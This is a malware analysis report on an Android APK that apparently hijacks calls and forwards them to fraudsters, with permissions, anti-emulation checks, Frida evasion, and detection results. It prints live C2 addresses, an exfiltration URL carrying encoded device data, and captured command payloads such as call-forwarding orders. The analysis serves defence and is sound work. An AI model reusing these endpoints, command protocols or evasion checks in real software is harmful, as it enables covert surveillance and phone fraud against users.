Basic Information:
---------------------------------------------------
Target OS: Android
File Type: Android archive file
File Size: 7.2M 
Package Name: net.twotwentyone7.tek.views20210311
SDK Version: 21
Main Activity: net.twotwentyone7.tek.views.MainActivitys
MD5SUM: d64d2ea841dbda0b56124d152866e602
Nation: Asia/Korea
---------------------------------------------------

Permissions:
---------------------------------------------------
- android.permission.FLASHLIGHT
- android.permission.PROCESS_OUTGOING_CALLS (RISKY)
- android.permission.CAMERA (RISKY)
- android.permission.READ_CALL_LOG (RISKY)
- android.permission.READ_CONTACTS (RISKY)
- android.permission.RECORD_AUDIO (RISKY)
- android.permission.READ_PHONE_NUMBERS (RISKY)
- android.permission.ACCESS_WIFI_STATE
- android.permission.FOREGROUND_SERVICE
- android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
- android.permission.WRITE_EXTERNAL_STORAGE (RISKY)
- android.permission.CALL_PHONE (RISKY)
- android.permission.WAKE_LOCK
- android.permission.RECEIVE_BOOT_COMPLETED
- android.permission.ACCESS_NETWORK_STATE
- android.permission.CHANGE_WIFI_STATE
- android.permission.READ_EXTERNAL_STORAGE (RISKY)
- android.permission.GET_TASKS
- android.permission.ACCESS_FINE_LOCATION (RISKY)
- android.permission.RECEIVE_USER_PRESENT
- android.permission.REORDER_TASKS
- android.permission.DISABLE_KEYGUARD
- android.permission.READ_PHONE_STATE (RISKY)
- android.permission.INTERNET
- android.permission.SYSTEM_ALERT_WINDOW
- android.permission.WRITE_CALL_LOG (RISKY)
- android.permission.READ_SMS (RISKY)
- android.permission.WRITE_CONTACTS (RISKY)
- android.permission.MODIFY_AUDIO_SETTINGS
- android.permission.ANSWER_PHONE_CALLS (RISKY)
---------------------------------------------------

Features:
-------------------------------------
- android.hardware.camera
- android.hardware.camera.autofocus
- android.hardware.telephony
-------------------------------------

Activites:
----------------------------------------------------
- net.twotwentyone7.tek.views.MainActivitys
- com.defmon.life.views.OneDPActivity
- net.twotwentyone7.tek.found.phone.DialerActivity
----------------------------------------------------

Services:
------------------------------------------------
- net.twotwentyone7.tek.services.MainServices
- net.twotwentyone7.tek.services.StandOutService
- net.twotwentyone7.tek.services.StandInService
- com.defmon.life.ser.LocalSev
- com.defmon.life.ser.HideForegroundServ
- com.defmon.life.ser.JobHandlServ
- com.defmon.life.ser.RemoteSer
- net.twotwentyone7.tek.found.phone.CallServ
- net.twotwentyone7.tek.found.phone.notify.NotiServ
- net.twotwentyone7.tek.lie.LSServ
- net.twotwentyone7.tek.lie.SoundServ
------------------------------------------------

Receivers:
-------------------------------------------
- net.twotwentyone7.tek.cast.CallListener
- com.defmon.life.rev.NotificationClickRev
-------------------------------------------

Protection:
------------------------------------------
- Anti Virtualization Codes
 \
  |--> Build.FINGERPRINT check
  |--> Build.MODEL check
  |--> Build.MANUFACTURER check
  |--> Build.BRAND check
  |--> Build.DEVICE check
  |--> Build.PRODUCT check
  |--> Build.HARDWARE check
  |--> Build.BOARD check
  |--> possible Build.SERIAL check
  |--> Build.TAGS check
  |--> SIM operator check
  |--> network operator name check

- Anti Debug Codes
 \
  |--> Debug.isDebuggerConnected() check
------------------------------------------

Domain Strings:
-------------------------------------------------------
- Extracted Possible IP Addresses
 \
  |--> 127.0.0.1 => Localhost
  |--> 10.0.0.172 => Probably private network address
  |--> 103.93.79.32
    |--> Host is up.
    |--> Country: Japan
    |--> VT says: "10+ detected files communicating with this IP address"
    |--> According to VT this domain is C2.

- Extracted URL's
 \
  |--> http://www.slf4j.org/codes.html#no_static_mdc_binder
  |--> https://developer.umeng.com/docs/66632/detail/
  |--> http://www.slf4j.org/codes.html#unsuccessfulInit
  |--> http://www.slf4j.org/codes.html#StaticLoggerBinder
  |--> https://docs.sentry.io/learn/quotas/
  |--> http://schemas.android.com/apk/res-auto
  |--> https://docs.sentry.io/clients/java/config/
  |--> https://docs.sentry.io/clients/java/modules/android/
  |--> https://cmnsguider.yunos.com:443/genDeviceToken
  |--> https://lark.alipay.com/yj131525/byt0wl/ufnf3i#A10200
  |--> http://www.slf4j.org/codes.html#version_mismatch
  |--> http://www.slf4j.org/codes.html#multiple_bindings
  |--> http://developer.umeng.com/docs/66650/cate/66650
  |--> http://www.slf4j.org/codes.html#replay
  |--> http://schemas.android.com/apk/res/android
  |--> https://docs.sentry.io/clients/java/config/#in-application-stack-frames
  |--> http://www.slf4j.org/codes.html#substituteLogger
  |--> http://www.slf4j.org/codes.html#loggerNameMismatch
  |--> https://developer.umeng.com/docs/66632/detail/70018?um_channel=sdk
  |--> http://www.slf4j.org/codes.html#null_MDCA
  |--> https://docs.sentry.io/clients/java/
--------------------------------------------------------

Connections:
-------------------------------------------------------
- http://103.159.80.61:8700/api/signal/7264f45980534a6d/WiFi/
 \
  |--> Method: GET

- http://103.159.80.61:8889/socket.io/?RzvXXa98mJ1uPNW5=ZGV2aWNlX2lkPTcyNjRmNDU5ODA1MzRhNmQmcGhvbmVOdW1iZXI9bnVsbCZjYXJyaWVyPSZzaW1fbnVtYmVyPW51bGwmbW9kZWw9U00tSjcwMEYmbWFudWZhY3R1cmVyPXNhbXN1bmcmcmVsZWFzZT02LjAuMSZib2FyZD11bml2ZXJzYWw3NTgwJmJvb3RfbG9hZGVyPUo3MDBGWFhVNEJSQTEmYnJhbmQ9c2Ftc3VuZyZkZXZpY2U9ajdlbHRlJmZpbmdlcnByaW50PXNhbXN1bmcvajdlbHRleHgvajdlbHRlOjYuMC4xL01NQjI5Sy9KNzAwRlhYVTRCUkExOnVzZXIvcmVsZWFzZS1rZXlzJmhhcmR3YXJlPXNhbXN1bmdleHlub3M3NTgwJmhvc3Q9U1dERzI5MTImcHJvZHVjdD1qN2VsdGV4eCZ0YWdzPXJlbGVhc2Uta2V5cyZ0eXBlPXVzZXImdXNlcj1kcGkmdmVyc2lvbl9yZWxlYXNlPTYuMC4xJnZlcnNpb25fY29kZW5hbWU9UkVMJnZlcnNpb25faW5jcmVtZW50YWw9SjcwMEZYWFU0QlJBMSZ2ZXJzaW9uX3Nkaz0wJnZlcnNpb25fc2RrX2ludD0yMyZmY21fdG9rZW49MCZmY21faWQ9MCZyaW5nX21vZGU9MSZzdGF0dXM9ZmFsc2UmZGVmYXVsdF9kaWFsZXI9ZmFsc2UmZGVmYXVsdF9kaWFsZXJfYXBwX25hbWU9S2nFn2lsZXImZGVmYXVsdF9kaWFsZXJfcGFja2FnZV9uYW1lPWNvbS5hbmRyb2lkLmNvbnRhY3RzJmlzX3NpbmdsZV9yZWNlaXZlPWZhbHNlJmlzX3NpbmdsZV9mYWtlcj1mYWxzZSZzaW5nbGVfcmVjZWl2ZV9udW1iZXI9JnNpbmdsZV9mYWtlcl9udW1iZXI9JnNpbmdsZUZha2VyQ2hhbmdlPQ&EIO=3&sid=bmPhUHpuCys85UKPAJ1k&transport=polling
 \
  |--> Method: GET, POST

- http://103.159.80.61:8700/api/default-dialer
 \
  |--> Method: POST

Connection Summary: This program sends everything about victim's device to remote server
-------------------------------------------------------

Touched Directories:
-----------------------------------------------
- cacheDirectory: /data/user/0/net.twotwentyone7.tek.views20210311/cache
- codeCacheDirectory: /data/user/0/net.twotwentyone7.tek.views20210311/code_cache
- externalCacheDirectory: /storage/emulated/0/Android/data/net.twotwentyone7.tek.views20210311/cache
- filesDirectory: /data/user/0/net.twotwentyone7.tek.views20210311/files
- obbDir: /storage/emulated/0/Android/obb/net.twotwentyone7.tek.views20210311
- packageCodePath: /data/app/net.twotwentyone7.tek.views20210311-1/base.apk
-----------------------------------------------

Interesting Sightings:
------------------------------------------------------------
- It sometimes detects and interrupts frida analysis
 \
  |--> Automatically shutdowns the program
** Solution: If you reboot the phone you can quickly open this program with frida (for a while!!)

- Interesting network payloads...
 \
  |--> Payload: 63:42["batteryLevelChange",{"imei":"7264f45980534a6d","level":30}]63:42["batteryLevelChange",{"imei":"7264f45980534a6d","level":30}]70:42["order",{"order":"setForwardNumber","forwardNumber":"07078931467"}]
  |--> Payload: 40:42["order",{"order":"getCurrentStatus"}]40:42["order",{"order":"getDefaultDialer"}]39:42["order",{"order":"getSettingsData"}]86:42["signalChange",{"device":"","message":{"imei":"7264f45980534a6d","signal":"WiFi"}}]86:42["si
  |--> Payload: 96:0{"sid":"lpLgDERdlkJE8AEJAJ1r","upgrades":["websocket"],"pingInterval":10000,"pingTimeout":5000}2:40
  |--> Payload: 40:42["order",{"order":"getCurrentStatus"}]40:42["order",{"order":"getDefaultDialer"}]39:42["order",{"order":"getSettingsData"}]
  |--> Payload: 96:0{"sid":"bmPhUHpuCys85UKPAJ1k","upgrades":["websocket"],"pingInterval":10000,"pingTimeout":5000}2:40
  |--> Payload: 21:42["forward-list",""]19:42["black-list",""]21:42["getFakerCall",""]47:42["batteryLevelChanged",29,"7264f45980534a6d"]25:42["getForwardNumber",""]47:42["batteryLevelChanged",29,"7264f45980534a6d"]
  |--> Payload: 44:42["currentStatus","7264f45980534a6d",false]
  |--> Payload: 63:42["batteryLevelChange",{"imei":"7264f45980534a6d","level":29}]63:42["batteryLevelChange",{"imei":"7264f45980534a6d","level":29}]57496:42["order",{"order":"forwardList","forwardList":[{"name":"롯데캐피탈","number":"157
  |--> Payload: 96:0{"sid":"s4rBI0Mp3ujlQFGUAJ1l","upgrades":["websocket"],"pingInterval":10000,"pingTimeout":5000}2:40
  |--> Payload: 96:0{"sid":"0TYrDSPpAgVzQbdZAJ1n","upgrades":["websocket"],"pingInterval":10000,"pingTimeout":5000}2:40
  |--> Payload: 96:0{"sid":"qVNnQSt0c3kzU8qJAJ1o","upgrades":["websocket"],"pingInterval":10000,"pingTimeout":5000}2:40
  |--> Payload: 47:42["batteryLevelChanged",29,"7264f45980534a6d"]

- Executing OS commands via "sh"
- Root checking
 \
  |--> Code: check_su_binary(new String[]{"/system/xbin/which", "su"});

- Reading disk stats from "/proc/diskstats"
- Checking "thermal_zone"
 \
  |--> Code: r1 = a("ls /sys/class/thermal", "thermal_zone");
-------------------------------------------------------------

Function Hooks:
------------------------------------------------------------
- When program executed
 \
  |--> net.twotwentyone7.tek.views.MainActivitys.onCreate
  |--> net.twotwentyone7.tek.views.MainActivitys.onResume
  |--> net.twotwentyone7.tek.views.MainActivitys.b
    |--> net.twotwentyone7.tek.views.MainActivitys.onResume()
    |--> net.twotwentyone7.tek.views.MainActivitys.onResume(Native Method)
    |--> android.app.Instrumentation.callActivityOnResume(Instrumentation.java:1287)
    |--> android.app.Activity.performResume(Activity.java:7015)
    |--> android.app.ActivityThread.performResumeActivity(ActivityThread.java:4210)
    |--> android.app.ActivityThread.handleResumeActivity(ActivityThread.java:4323)
    |--> android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:3426)
    |--> android.app.ActivityThread.access$1100(ActivityThread.java:229)
    |--> android.app.ActivityThread$H.handleMessage(ActivityThread.java:1821)
    |--> android.os.Handler.dispatchMessage(Handler.java:102)
    |--> android.os.Looper.loop(Looper.java:148)
    |--> android.app.ActivityThread.main(ActivityThread.java:7325)
    |--> java.lang.reflect.Method.invoke(Native Method)
    |--> com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:1230)
    |--> com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1120)

- When filling forms and click send button
 \
  |--> net.twotwentyone7.tek.views.MainActivitys.c
    |--> net.twotwentyone7.tek.views.MainActivitys$b.shouldOverrideUrlLoading()
    |--> org.chromium.android_webview.AwContentsClientBridge.shouldOverrideUrlLoading(chromium-SystemWebViewGoogle.aab-stable-438908600:15)
    |--> android.os.MessageQueue.nativePollOnce(Native Method)
    |--> android.os.MessageQueue.next(MessageQueue.java:323)
    |--> android.os.Looper.loop(Looper.java:135)
    |--> android.app.ActivityThread.main(ActivityThread.java:7325)
    |--> java.lang.reflect.Method.invoke(Native Method)
    |--> com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:1230)
    |--> com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1120)
-------------------------------------------------------------

Detected by:
-------------------------------------------------------
- VirusTotal
 \
  |--> 33/61

- Hybrid Analysis
 \
  |--> MetaDefender
   \-> %15
   /
  |--> VirusTotal
   \-> %54

- Scan reports
 \
  |--> VirusTotal
   \-> https://www.virustotal.com/gui/file/dd679ed92ab85e7b3f6d6b8996f681ba07b8e5afd7cf38a33b4edac38f392f4d/relations
   /
  |--> Hybrid Analysis
   \-> https://www.hybrid-analysis.com/sample/dd679ed92ab85e7b3f6d6b8996f681ba07b8e5afd7cf38a33b4edac38f392f4d
   \-> https://www.hybrid-analysis.com/sample/dd679ed92ab85e7b3f6d6b8996f681ba07b8e5afd7cf38a33b4edac38f392f4d/604fbfb2e0ca302d40580a7e
-------------------------------------------------------

Used Tools During Tests:
------------------------------------------
- Qu1cksc0pe
 \
  |--> https://github.com/CYB3RMX/Qu1cksc0pe

- MobSF
 \
  |--> https://github.com/MobSF/Mobile-Security-Framework-MobSF

- Objection
 \
  |--> https://github.com/sensepost/objection

- ArpSpoof tool (ParrotOS built in tool)
- Wireshark
- Apktool
- Frida
- Base64 decoder
 \
  |--> https://www.base64decode.org/
------------------------------------------
